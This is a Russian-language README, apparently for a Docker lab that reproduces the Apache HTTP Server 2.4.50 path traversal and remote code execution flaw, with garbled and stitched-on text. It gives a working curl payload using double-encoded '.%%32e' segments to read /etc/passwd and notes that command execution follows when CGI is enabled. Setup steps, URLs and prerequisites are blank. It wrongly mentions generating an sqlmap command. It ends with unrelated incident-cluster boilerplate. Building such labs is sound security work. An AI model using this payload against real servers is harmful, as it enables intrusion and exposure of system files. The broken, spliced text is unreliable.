##
Этот проект направлен на докеризацию конкретной уязвимости с помощью Docker. Цель — создать изолированную среду, в которой уязвимость можно безопасно эксплуатировать и тестировать.
Apache HTTP Server 2.4.50 - удалённое выполнение кода && обход пути
Для запуска этого проекта на вашей машине должны быть установлены:
После установки необходимых компонентов вы можете склонировать этот Git-репозиторий на свою машину:
git clone
Находясь в каталоге, выполните команду ниже, чтобы развернуть уязвимую среду:
Затем перейдите к приложению по адресу Если всё прошло успешно, вы должны увидеть сообщение "It works"
Выполнение этого payload с помощью `curl`, приведённого ниже, показывает, что цель уязвима. Скрипт сгенерирует соответствующую команду sqlmap для эксплуатации уязвимости
curl -v --path-as-is localhost:8000/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd
Этот payload позволяет напрямую получать информацию о пользователе в системе без согласия пользователя.
После активации модулей cgi или cgid на сервере данная уязвимость позволит атакующему выполнять произвольные команды
The full story
This article is one source in a clustered incident — the cluster page carries the summary, timeline and every other outlet covering it.
